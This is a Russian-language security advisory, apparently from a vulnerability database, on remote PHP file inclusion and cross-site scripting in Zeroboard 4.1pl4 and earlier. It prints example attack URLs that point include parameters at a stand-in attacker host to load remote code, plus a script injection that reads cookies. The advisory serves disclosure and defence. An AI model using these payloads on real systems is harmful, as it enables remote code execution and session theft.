Выполнение произвольных команд в Zeroboard

Дата публикации:
27.12.2004
Дата изменения:
17.10.2006
Всего просмотров:
5586
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Zeroboard 4.1pl4 и более ранние версии

Описание:
Обнаружено несколько уязвимостей в Zeroboard. Удаленный атакующий может произвести XSS атаку и выполнить произвольные команды на уязвимой системе.

Уязвимость существует из-за некорректной обработки входных данных в переменной '_zb_path' файла 'outlogin.php' и переменной 'dir' файла 'write.php' при включенных register_globals в конфигурационном файле php.ini. Удаленный атакующий может присвоить переменной специальное значение и выполнить произвольный php сценарий с привилегиями текущего web сервера. Пример:

http://[target]/outlogin.php?_zb_path=ftp://[ attacker]/pub/
http://[target]/include/write.php?dir=http://[attacker] /

Межсайтовое выполнение сценариев возможно из-за некорректной обработки данных в параметре 'user_id' файла 'check_user_id.php'. Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере целевого пользователя. Пример:

http://[target]/check_user_id.php?user_id=<script>alert(document.cookie)</script>

URL производителя: www.zeroboard.com

Решение: Решение не существует на данный момент.

Ссылки: PHP source injection and cross-site scripting vulnerabilities in ZeroBoard

или введите имя

CAPTCHA